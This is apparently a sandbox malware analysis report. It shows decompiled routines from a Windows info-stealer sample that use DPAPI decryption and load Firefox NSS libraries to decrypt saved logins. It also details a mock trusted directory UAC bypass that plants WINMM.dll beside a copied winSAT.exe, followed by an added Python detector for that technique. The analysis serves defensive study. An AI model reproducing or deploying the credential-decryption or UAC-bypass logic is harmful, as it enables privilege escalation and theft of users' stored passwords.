                                  • LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040C745
                                  • BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040C773
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • LocalFree.KERNEL32(?), ref: 0040C7FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: HeapLocal$AllocAllocateCryptDecryptFreeProcess
                                  • String ID: 0$v1
                                  • API String ID: 4131498132-3331332043
                                  • Opcode ID: 0d7ad95d91672adb1202174cf130c5b7be13771ab2cb2749681f65612fe1e175
                                  • Instruction ID: 2970a0a6e6da2b46dc71b506d453e3d8838dace9638eca7dbf8707eb64b33263
                                  • Opcode Fuzzy Hash: 0d7ad95d91672adb1202174cf130c5b7be13771ab2cb2749681f65612fe1e175
                                  • Instruction Fuzzy Hash: 064160B2D00108BBDB01ABD5DC85EEFB7BCEF44344F14813BF911A2290E7389A458B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041405F(void* __ecx, void* __eflags) {
                                  				char _v264;
                                  				intOrPtr _v292;
                                  				void* _v300;
                                  				int _t11;
                                  				void* _t22;
                                  
                                  				_t22 = CreateToolhelp32Snapshot(2, 0);
                                  				E00401052( &_v300, 0, 0x128);
                                  				_v300 = 0x128;
                                  				_t11 = Process32First(_t22,  &_v300);
                                  				while(_t11 != 0) {
                                  					if(E00401176( &_v264, "explorer.exe") == 0) {
                                  						return _v292;
                                  					}
                                  					_t11 = Process32Next(_t22,  &_v300);
                                  				}
                                  				CloseHandle(_t22);
                                  				return 0;
                                   			}

                                   Instruction addresses for the decompiled lines above (address column flattened by extraction): 0x00414079 to 0x004140cd

                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041406E
                                  • Process32First.KERNEL32(00000000,?), ref: 0041409B
                                  • Process32Next.KERNEL32(00000000,?), ref: 004140C2
                                  • CloseHandle.KERNEL32(00000000), ref: 004140CD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID: explorer.exe
                                  • API String ID: 420147892-3187896405
                                  • Opcode ID: a7811eb097bfb4c1731681bec79869e76dd77b3fb60978c9c8995b6681227ad2
                                  • Instruction ID: ea809b74c35a4b4e8447ab93d020d769017f33877584137915eab964d6a7a943
                                  • Opcode Fuzzy Hash: a7811eb097bfb4c1731681bec79869e76dd77b3fb60978c9c8995b6681227ad2
                                  • Instruction Fuzzy Hash: CB01A972505114ABD7209761EC09FDB77FCDF49310F1040B6FA45E21C0EA78DAD58A6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 24%
                                  			E00409D97(intOrPtr __ecx, WCHAR* __edx, void* __eflags, intOrPtr _a4) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v16;
                                  				intOrPtr _v20;
                                  				char _v24;
                                  				char _v8216;
                                  				char* _t24;
                                  				signed int _t27;
                                  				WCHAR* _t29;
                                  				intOrPtr _t30;
                                  				signed int* _t31;
                                  				intOrPtr _t32;
                                  				void* _t34;
                                  				intOrPtr _t35;
                                  				intOrPtr _t36;
                                  				void* _t38;
                                  				void* _t39;
                                  
                                  				_t30 = __ecx;
                                  				E004011C0(0x2014, __ecx);
                                  				_t36 = _a4;
                                  				_t29 = __edx;
                                  				_v8 = _t30;
                                  				_t3 = _t36 - 1; // -1
                                  				_t34 = GlobalAlloc(0x40, _t3);
                                  				_t38 = 1;
                                  				if(_t36 > 1) {
                                  					_t32 = _v8;
                                  					do {
                                  						 *((char*)(_t34 + _t38 - 1)) =  *((intOrPtr*)(_t38 + _t32));
                                  						_t38 = _t38 + 1;
                                  					} while (_t38 < _t36);
                                  				}
                                  				_t8 = _t36 - 1; // -1
                                  				_v12 = _t34;
                                  				_v16 = _t8;
                                  				_t39 = 0;
                                  				_t24 =  &_v16;
                                  				__imp__CryptUnprotectData(_t24, 0, 0, 0, 0, 0,  &_v24);
                                  				if(_t24 == 0) {
                                  					_push(L"Could not decrypt");
                                  				} else {
                                  					if(_t36 > 0) {
                                  						_t35 = _v20;
                                  						_t31 =  &_v8216;
                                  						do {
                                  							_t27 =  *(_t35 + _t39) & 0x000000ff;
                                  							_t39 = _t39 + 2;
                                  							 *_t31 = _t27;
                                  							_t31 =  &(_t31[0]);
                                  						} while (_t39 < _t36);
                                  					}
                                  					_push( &_v8216);
                                  				}
                                  				return lstrcpyW(_t29, ??);
                                   			}

                                   Instruction addresses for the decompiled lines above (address column flattened by extraction): 0x00409d97 to 0x00409e2c

                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,-00000001,74A345FD,?,?,?,00409D4B,00001000,?,00000000,00001000), ref: 00409DB5
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00409D4B), ref: 00409DEB
                                  • lstrcpyW.KERNEL32(?,Could not decrypt), ref: 00409E22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocCryptDataGlobalUnprotectlstrcpy
                                  • String ID: Could not decrypt
                                  • API String ID: 3112367126-1484008118
                                  • Opcode ID: a053b4f1fbd8e89e50c43ed9a83f9f24782582740e94a77ed331465ef246dd5e
                                  • Instruction ID: aa4716c66a3a11094124d3c9fea6a44173f7715366435e59aa3e46d54874a9c7
                                  • Opcode Fuzzy Hash: a053b4f1fbd8e89e50c43ed9a83f9f24782582740e94a77ed331465ef246dd5e
                                  • Instruction Fuzzy Hash: 6E11C676904219ABC711CB99C8809EFF7BCEF88704B1045BBE955F7292E6359E01CBE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E0040C3B9(intOrPtr __ecx, void** __edx, long* _a4) {
                                  				intOrPtr _v8;
                                  				void* _t6;
                                  				void* _t8;
                                  				long* _t9;
                                  				void* _t13;
                                  				void** _t14;
                                  				void* _t16;
                                  				void* _t17;
                                  
                                  				_t9 = _a4;
                                  				_t17 = 0;
                                  				_v8 = __ecx;
                                  				_t14 = __edx;
                                  				 *_t9 = 0;
                                  				 *((intOrPtr*)(__edx)) = 0;
                                  				__imp__CryptStringToBinaryW(__ecx, 0, 1, 0, _t9, 0, 0, _t13, _t16, _t8, __ecx);
                                  				if(__ecx != 0) {
                                  					_t6 = LocalAlloc(0x40,  *_t9);
                                  					 *_t14 = _t6;
                                  					if(_t6 != 0) {
                                  						__imp__CryptStringToBinaryW(_v8, 0, 1, _t6, _t9, 0, 0);
                                  						_t17 = _t6;
                                  						if(_t17 == 0) {
                                  							 *_t14 = LocalFree( *_t14);
                                  						}
                                  					}
                                  				}
                                  				return _t17;
                                   			}

                                   Instruction addresses for the decompiled lines above (address column flattened by extraction): 0x0040c3be to 0x0040c418

                                  APIs
                                  • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                  • LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                  • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                  • LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: de5d65555f31f5c98b5c1a3d0e77876cadd448468ad4c2dd5e4a6cd100e7a101
                                  • Instruction ID: 97c3cc2928edf4510a7e7d2c17aa5025b134dfc6b4fce315ddd3b78eefc3bfdb
                                  • Opcode Fuzzy Hash: de5d65555f31f5c98b5c1a3d0e77876cadd448468ad4c2dd5e4a6cd100e7a101
                                  • Instruction Fuzzy Hash: A6011D71641231BFD7214B569C49EA7BFACEF497E0B108131F948E6290D7B18D00DAA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040EDA9(intOrPtr* __ecx, char __edx) {
                                  				char _v12;
                                  				long _v16;
                                  				intOrPtr _v20;
                                  				char _v24;
                                  				intOrPtr _v28;
                                  				char _v32;
                                  				intOrPtr _v52;
                                  				void _v56;
                                  				void* _t14;
                                  				intOrPtr _t17;
                                  				union _PROCESSINFOCLASS _t20;
                                  				intOrPtr* _t29;
                                  				intOrPtr _t31;
                                  
                                  				_t29 = __ecx;
                                  				_v12 = __edx;
                                  				_t20 = 0;
                                  				_t31 = 1;
                                  				if( *__ecx != 1) {
                                  					_t14 = GetCurrentProcess();
                                  					_t31 =  *_t29;
                                  				} else {
                                  					_t14 =  *( *(__ecx + 4));
                                  				}
                                  				_v32 = _v12;
                                  				_v28 = 0x426970;
                                  				_v20 = _t29;
                                  				if(_t31 == 1 && NtQueryInformationProcess(_t14, _t20,  &_v56, 0x18,  &_v16) >= 0 && _v16 == 0x18) {
                                  					_t17 = _v52;
                                  					if(_t17 != 0) {
                                  						_t11 =  &_v24; // 0x40ec60
                                  						_v24 = _t17;
                                  						_t20 = E0040EE24( &_v32, _t11, 0x150);
                                  					}
                                  				}
                                  				return _t20;
                                   			}

                                   Instruction addresses for the decompiled lines above (address column flattened by extraction): 0x0040edb2 to 0x0040ee23

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000001,C0000135,0040EAD8,?,?,?,?,?,?,?,?,?,0040EC60,?,00000000,?), ref: 0040EDC7
                                  • NtQueryInformationProcess.NTDLL ref: 0040EDF0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CurrentInformationQuery
                                  • String ID: `@
                                  • API String ID: 3953534283-951712118
                                  • Opcode ID: 3907fd75677dc873825907a835a0b947a967a032764e8d362cafd5afed52a1bb
                                  • Instruction ID: 3ac64283fd91789c4a21a164da3f73717bcde32abe73c1a33020f5e4c519176d
                                  • Opcode Fuzzy Hash: 3907fd75677dc873825907a835a0b947a967a032764e8d362cafd5afed52a1bb
                                  • Instruction Fuzzy Hash: C0016171E00219AFDB04CF96D8848AFB7B9EB44351B10447AE511B7280D7745E54CFE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 18%
                                  			E00412F55(void* __eflags) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				struct _SHELLEXECUTEINFOW _v76;
                                  				short _v2124;
                                  				short _v4172;
                                  				char _v6220;
                                  				void* _t63;
                                  				void* _t69;
                                  				void* _t72;
                                  				void* _t80;
                                  				void* _t81;
                                  
                                  				E004011C0(0x1848, _t72);
                                  				if(E0041111B() != 1) {
                                  					CloseHandle( *0x559cb0);
                                  					E00401052( &_v76, 0, 0x3c);
                                  					_v8 = 0;
                                  					__imp__Wow64DisableWow64FsRedirection( &_v8);
                                  					E00401052( &_v6220, 0, 0x800);
                                  					GetModuleFileNameW(0,  &_v6220, 0x800);
                                  					E00401052( &_v2124, 0, 0x800);
                                  					GetSystemDirectoryW( &_v2124, 0x800);
                                  					lstrcatW( &_v2124, L"\\winSAT.exe");
                                  					E00401052( &_v4172, 0, 0x800);
                                  					GetSystemDirectoryW( &_v4172, 0x800);
                                  					lstrcatW( &_v4172, L"\\winmm.dll");
                                  					CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0);
                                  					// Mock trusted directory: "C:\Windows \" (trailing space) can only be created through a \\?\ path; WoW64 file-system redirection was disabled earlier in this function
                                  					CreateDirectoryW(L"\\\\?\\C:\\Windows \\System32", 0);
                                  					// _v2124 = <system dir>\winSAT.exe (auto-elevating Windows binary); _v4172 = <system dir>\winmm.dll, kept as winmmd.dll (presumably the forwarding target of the planted WINMM.dll)
                                  					CopyFileW( &_v2124, L"\\\\?\\C:\\Windows \\System32\\winSAT.exe", 0);
                                  					CopyFileW( &_v4172, L"\\\\?\\C:\\Windows \\System32\\winmmd.dll", 0);
                                  					// E00412F0D opens or creates HKCU\SOFTWARE\Microsoft\Control Panel\; a 0x1000-byte REG_SZ named "Virtual Machine Platform" is stored there
                                  					_t80 = E00412F0D(_t72);
                                  					RegSetValueExW(_t80, L"Virtual Machine Platform", 0, 1,  &_v6220, 0x1000);
                                  					RegCloseKey(_t80);
                                  					// Under WoW64 (64-bit host, so the copied winSAT.exe is 64-bit) the embedded image at 0x420408 (0x3000 bytes) is used; otherwise the one at 0x423408 (0x2e00 bytes)
                                  					__imp__IsWow64Process(GetCurrentProcess(),  &_v12);
                                  					_push(0);                 // hTemplateFile
                                  					_push(0);                 // dwFlagsAndAttributes
                                  					_push(2);                 // CREATE_ALWAYS
                                  					_push(0);                 // lpSecurityAttributes
                                  					_push(0);                 // dwShareMode
                                  					_push(0x40000000);        // GENERIC_WRITE
                                  					_push(L"\\\\?\\C:\\Windows \\System32\\WINMM.dll");
                                  					if(_v12 != 0) {
                                  						_t63 = CreateFileW();
                                  						_push(0);             // lpOverlapped
                                  						_t81 = _t63;
                                  						_push( &_v16);        // lpNumberOfBytesWritten
                                  						_push(0x3000);        // nNumberOfBytesToWrite
                                  						_push(0x420408);      // lpBuffer: embedded DLL image
                                  					} else {
                                  						_t69 = CreateFileW();
                                  						_push(0);             // lpOverlapped
                                  						_t81 = _t69;
                                  						_push( &_v16);        // lpNumberOfBytesWritten
                                  						_push(0x2e00);        // nNumberOfBytesToWrite
                                  						_push(0x423408);      // lpBuffer: embedded DLL image
                                  					}
                                  					WriteFile(_t81, ??, ??, ??, ??);   // the four arguments are the pushes above: buffer, size, &_v16, NULL
                                  					CloseHandle(_t81);
                                  					// SHELLEXECUTEINFOW (cbSize 0x3c), window hidden: "C:\Windows \System32\winSAT.exe formal". The trusted-path check canonicalizes the path (dropping the space), so winSAT.exe is treated as a System32 binary, auto-elevates, and loads the planted WINMM.dll from its own directory
                                  					_v76.cbSize = 0x3c;
                                  					_v76.lpFile = L"C:\\Windows \\System32\\winSAT.exe";
                                  					_v76.lpParameters = L"formal";
                                  					_v76.nShow = 0;                   // SW_HIDE
                                  					_v76.hwnd = 0;
                                  					_v76.lpDirectory = 0;
                                  					ShellExecuteExW( &_v76);
                                  					__imp__Wow64RevertWow64FsRedirection(_v8);
                                  					Sleep(0x7d0);                     // 2 s grace, then the dropper exits
                                  					ExitProcess(0);
                                  				}
                                  				return 0;
                                  			}
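The routine above is the mock trusted directory UAC bypass: with WoW64 file-system redirection disabled it creates `\\?\C:\Windows \System32` (the trailing space after `Windows` is only creatable through a `\\?\` path), copies the auto-elevating `winSAT.exe` and the real `winmm.dll` (as `winmmd.dll`) into it, writes its own `WINMM.dll` there from an embedded image (0x3000 bytes at 0x420408 on a 64-bit host, 0x2e00 bytes at 0x423408 otherwise) and launches `winSAT.exe formal` hidden through ShellExecuteExW. The trusted-directory check in appinfo canonicalizes the path, which drops the space, so `winSAT.exe` passes as a System32 binary, is auto-elevated, and resolves `winmm.dll` from its own directory first. The same canonicalization gives a detection: a path that changes under normalization and then lands in a trusted directory is a look-alike. The Python below is an added example for this report, not Joe Sandbox output and not the sample's code; it runs that check over constructed Sysmon-style events (the field names are an assumption) and also flags the `Control Panel\Virtual Machine Platform` value the routine writes as a sample-specific indicator.

```python
import ntpath

# Constructed Sysmon-style events for this example (not taken from the sandbox trace).
# They mirror what the routine above does; the final legitimate winsat.exe launch is the
# control case that must stay silent.
SAMPLE_EVENTS = [
    {"event": "FileCreate", "path": r"\\?\C:\Windows \System32\winSAT.exe"},
    {"event": "FileCreate", "path": r"\\?\C:\Windows \System32\winmmd.dll"},
    {"event": "FileCreate", "path": r"\\?\C:\Windows \System32\WINMM.dll"},
    {"event": "RegistryValueSet", "key": r"HKCU\SOFTWARE\Microsoft\Control Panel",
     "value": "Virtual Machine Platform"},
    {"event": "ProcessCreate", "path": r"C:\Windows \System32\winSAT.exe", "cmdline": "winSAT.exe formal"},
    {"event": "ProcessCreate", "path": r"C:\Windows\System32\winsat.exe", "cmdline": "winsat.exe formal"},
]

# Directories whose auto-elevating binaries the trusted-path check accepts (kept minimal here).
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
# Auto-elevating binary -> DLLs it resolves from its own directory; the pairing this sample uses.
SIDELOAD_PAIRS = {"winsat.exe": {"winmm.dll"}}


def strip_win32_prefix(path):
    r"""Drop the \\?\ prefix; it is what lets CreateDirectoryW keep the trailing space."""
    return path[4:] if path.startswith("\\\\?\\") else path


def canonical(path):
    r"""Normalise the way Win32 does for non-\\?\ paths: trailing spaces and dots are
    removed from every component, so 'C:\Windows \System32' collapses onto the real
    'c:\windows\system32'.  That collapse is what the bypass relies on."""
    comps = strip_win32_prefix(path).split("\\")
    return "\\".join(c.rstrip(" .") for c in comps).lower()


def is_mock_trusted_path(path):
    """A look-alike: the path changes under canonicalisation and then sits in a trusted dir."""
    raw = strip_win32_prefix(path).lower()
    norm = canonical(path)
    return raw != norm and norm.startswith(TRUSTED_DIRS)


def detect(events):
    """Return (tag, artefact) findings for the staging, launch and registry steps."""
    findings = []
    staged = {}  # canonical mock directory -> basenames written into it so far
    for ev in events:
        kind = ev["event"]
        if kind == "FileCreate" and is_mock_trusted_path(ev["path"]):
            norm = canonical(ev["path"])
            staged.setdefault(ntpath.dirname(norm), set()).add(ntpath.basename(norm))
            findings.append(("mock_trusted_dir_write", ev["path"]))
        elif kind == "ProcessCreate" and is_mock_trusted_path(ev["path"]):
            norm = canonical(ev["path"])
            exe = ntpath.basename(norm)
            planted = staged.get(ntpath.dirname(norm), set())
            # Launch of an auto-elevating binary next to a DLL it will load: the full bypass.
            if SIDELOAD_PAIRS.get(exe, set()) & planted:
                findings.append(("uac_bypass_sideload", ev["path"]))
            else:
                findings.append(("mock_trusted_dir_exec", ev["path"]))
        elif (kind == "RegistryValueSet"
              and ev["key"].lower().endswith(r"\microsoft\control panel")
              and ev["value"] == "Virtual Machine Platform"):
            # Value name this sample writes (REG_SZ, 0x1000 bytes); a sample-specific indicator.
            findings.append(("control_panel_value", ev["key"] + "\\" + ev["value"]))
    return findings


if __name__ == "__main__":
    for tag, artefact in detect(SAMPLE_EVENTS):
        print(f"{tag:24s} {artefact}")
```

The process-creation hit is upgraded to `uac_bypass_sideload` only when a DLL that the launched binary loads from its own directory was written into the same mock directory earlier; a launch from a look-alike directory with no staging seen still alerts as `mock_trusted_dir_exec`, and the genuine `C:\Windows\System32\winsat.exe` never does, because its path is unchanged by canonicalisation.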
                                  Statement addresses for this function: 0x00412f5d to 0x00413139

                                  APIs
                                    • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,74A313FB,00000000,74A313FB,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                    • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                    • Part of subcall function 0041111B: GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                    • Part of subcall function 0041111B: CloseHandle.KERNEL32(00000000), ref: 00411167
                                  • CloseHandle.KERNEL32(?), ref: 00412F7F
                                  • Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,00000000,?,?,?,00405909,?,00000000,00000000,?,?,?,?,?,?), ref: 00412F99
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,?,?,?,?,?,00405909,?,00000000,00000000), ref: 00412FBE
                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00412FE3
                                  • lstrcatW.KERNEL32 ref: 00412FF7
                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0041301B
                                  • lstrcatW.KERNEL32 ref: 00413029
                                  • CreateDirectoryW.KERNEL32(\\?\C:\Windows \,00000000), ref: 00413039
                                  • CreateDirectoryW.KERNEL32(\\?\C:\Windows \System32,00000000), ref: 00413041
                                  • CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winSAT.exe,00000000), ref: 00413056
                                  • CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winmmd.dll,00000000), ref: 00413065
                                    • Part of subcall function 00412F0D: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,000F003F,l0A,00000000,767182ED,766F13E0,?,?,0041306C), ref: 00412F2C
                                    • Part of subcall function 00412F0D: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,00000000,00000000,000F003F,00000000,l0A,00000000,?,?,0041306C), ref: 00412F47
                                  • RegSetValueExW.ADVAPI32(00000000,Virtual Machine Platform,00000000,00000001,?,00001000), ref: 00413083
                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041308A
                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 00413094
                                  • IsWow64Process.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041309B
                                  • CreateFileW.KERNEL32(\\?\C:\Windows \System32\WINMM.dll,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004130B6
                                  • CreateFileW.KERNEL32(\\?\C:\Windows \System32\WINMM.dll,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004130CF
                                  • WriteFile.KERNEL32(00000000,00420408,00003000,?,00000000), ref: 004130E7
                                  • CloseHandle.KERNEL32(00000000), ref: 004130EE
                                  • ShellExecuteExW.SHELL32(?), ref: 00413112
                                  • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 0041311B
                                  • Sleep.KERNEL32(000007D0), ref: 00413126
                                  • ExitProcess.KERNEL32 ref: 0041312D
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: File$CreateProcessWow64$CloseDirectory$Handle$CopyCurrentOpenRedirectionSystemTokenlstrcat$DisableExecuteExitInformationModuleNameRevertShellSleepValueWrite
                                  • String ID: <$C:\Windows \System32\winSAT.exe$Virtual Machine Platform$\\?\C:\Windows \$\\?\C:\Windows \System32$\\?\C:\Windows \System32\WINMM.dll$\\?\C:\Windows \System32\winSAT.exe$\\?\C:\Windows \System32\winmmd.dll$\winSAT.exe$\winmm.dll$formal
                                  • API String ID: 371289168-2038174052
                                  • Opcode ID: 030c532d15d01d55ddb18d83e7d6d465989f293f85a1660a9534233c15bfab61
                                  • Instruction ID: 38432614936820ae09a91b85de116fe05e5ca363bce1e2b84a591d1acda27bec
                                  • Opcode Fuzzy Hash: 030c532d15d01d55ddb18d83e7d6d465989f293f85a1660a9534233c15bfab61
                                  • Instruction Fuzzy Hash: E9413371940258BBDB219BE1DC49ECF7FBCEF45710F104066F605E2190DB785A85CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E0040ADE3(void* __ecx, void* __edx, WCHAR* _a4) {
                                  				WCHAR* _v8;
                                  				long _v12;
                                  				WCHAR* _v16;
                                  				WCHAR* _v20;
                                  				char _v24;
                                  				char _v28;
                                  				WCHAR* _v32;
                                  				WCHAR* _v36;
                                  				WCHAR* _v40;
                                  				short _v560;
                                  				struct HINSTANCE__* _t135;
                                  				WCHAR* _t158;
                                  				intOrPtr _t194;
                                  				void* _t206;
                                  				void* _t216;
                                  				void* _t218;
                                  
                                  				_t206 = __edx;
                                  				_t158 = 0;
                                  				_t216 = __ecx;
                                  				E00401052( &_v560, 0, 0x104);              // zero a MAX_PATH buffer
                                  				GetCurrentDirectoryW(0x104,  &_v560);     // remember the caller's CWD; restored once the exports are resolved
                                  				SetCurrentDirectoryW(_a4);                // _a4 = Firefox install directory, so nss3.dll's own dependencies resolve from there
                                  				E0040357C( &_a4, _t206, 0, "\\");
                                  				E0040373F( &_v40,  &_a4);
                                  				E0040357C( &_v40, _t206, 0, L"nss3.dll");
                                  				E0040373F( &_v20,  &_a4);
                                  				E0040357C( &_v20, _t206, 0, L"msvcr120.dll");
                                  				E0040373F( &_v16,  &_a4);
                                  				E0040357C( &_v16, _t206, 0, L"msvcp120.dll");
                                  				E0040373F( &_v36,  &_a4);
                                  				E0040357C( &_v36, _t206, 0, L"mozglue.dll");
                                  				E0040373F( &_v32,  &_a4);
                                  				E0040357C( &_v32, _t206, 0, L"softokn3.dll");
                                  				E0040373F( &_v28,  &_a4);
                                  				E0040357C( &_v28, _t206, 0, L"msvcp");
                                  				E0040373F( &_v24,  &_a4);
                                  				E0040357C( &_v24, _t206, 0, L"msvcr");
                                  				_t218 = 0x5a;        // msvcr<N>.dll probe: N = 90, 100, ... stepping by 0xa until 0x96 (150), to find the VC runtime the installed Firefox build ships
                                  				_v12 = 0x104;        // msvcp<N>.dll probe counter for the loop below (same step 0xa, exit at 0x96)
                                  				while(1) {
                                  					E0040373F( &_v8,  &_v28);
                                  					E0040357C(E00403384( &_v8, _t206, 0, _v12), _t206, 0, L".dll");
                                  					if(PathFileExistsW(_v8) != 0) {
                                  						break;
                                  					}
                                  					_v12 = _v12 + 0xa;
                                  					E00405FEB(_v8);
                                  					_t224 = _v12 - 0x96;
                                  					_v8 = _t158;
                                  					if(_v12 != 0x96) {
                                  						continue;
                                  					} else {
                                  						while(1) {
                                  							L5:
                                  							E0040373F( &_v8,  &_v24);
                                  							E0040357C(E00403384( &_v8, _t206, _t224, _t218), _t206, _t224, L".dll");
                                  							if(PathFileExistsW(_v8) != 0) {
                                  								break;
                                  							}
                                  							_t218 = _t218 + 0xa;
                                  							E00405FEB(_v8);
                                  							_v8 = _t158;
                                  							if(_t218 != 0x96) {
                                  								continue;
                                  							}
                                  							L9:
                                  							 *((intOrPtr*)(_t216 + 0xa8)) = LoadLibraryW(_v20);   // msvcr120.dll
                                  							 *((intOrPtr*)(_t216 + 0xac)) = LoadLibraryW(_v16);   // msvcp120.dll
                                  							 *((intOrPtr*)(_t216 + 0xb0)) = LoadLibraryW(_v36);   // mozglue.dll
                                  							 *((intOrPtr*)(_t216 + 0xb4)) = LoadLibraryW(_v40);   // nss3.dll
                                  							_t135 = LoadLibraryW(_v32);                             // softokn3.dll
                                  							 *(_t216 + 0xb8) = _t135;
                                  							if( *((intOrPtr*)(_t216 + 0xac)) != _t158 &&  *((intOrPtr*)(_t216 + 0xb0)) != _t158) {
                                  								_t194 =  *((intOrPtr*)(_t216 + 0xb4));
                                  								if(_t194 != 0) {
                                  									_t230 = _t135;
                                  									if(_t135 != 0) {
                                  										_push(_t194);
                                  										// E00411E88 resolves the named export from nss3.dll (GetProcAddress does not appear in this function's API list, so it looks like a hand-rolled resolver).
                                  										// The set below is what is needed to NSS_Init on a profile, authenticate against a master password, base64-decode the stored login fields and PK11SDR_Decrypt them.
                                  										 *((intOrPtr*)(_t216 + 0x68)) = E00411E88(_t194, "NSS_Init", _t230);
                                  										 *((intOrPtr*)(_t216 + 0x80)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_GetInternalKeySlot", _t230);
                                  										 *((intOrPtr*)(_t216 + 0x7c)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_Authenticate", _t230);
                                  										 *((intOrPtr*)(_t216 + 0x70)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11SDR_Decrypt", _t230);
                                  										 *((intOrPtr*)(_t216 + 0x74)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "NSSBase64_DecodeBuffer", _t230);
                                  										 *((intOrPtr*)(_t216 + 0x78)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_CheckUserPassword", _t230);
                                  										 *((intOrPtr*)(_t216 + 0x6c)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "NSS_Shutdown", _t230);
                                  										 *((intOrPtr*)(_t216 + 0x84)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_FreeSlot", _t230);
                                  										 *((intOrPtr*)(_t216 + 0x88)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PR_GetError", _t230);
                                  										SetCurrentDirectoryW( &_v560);                        // restore the original CWD
                                  										_t158 = 1;
                                  									}
                                  								}
                                  							}
                                  							E00405FEB(_v24);
                                  							E00405FEB(_v28);
                                  							E00405FEB(_v32);
                                  							E00405FEB(_v36);
                                  							E00405FEB(_v16);
                                  							E00405FEB(_v20);
                                  							E00405FEB(_v40);
                                  							E00405FEB(_a4);
                                  							return _t158;
                                  						}
                                  						E00403549( &_v20,  &_v8);
                                  						E00405FEB(_v8);
                                  						goto L9;
                                  					}
                                  				}
                                  				E00403549( &_v16,  &_v8);
                                  				E00405FEB(_v8);
                                  				goto L5;
                                  			}
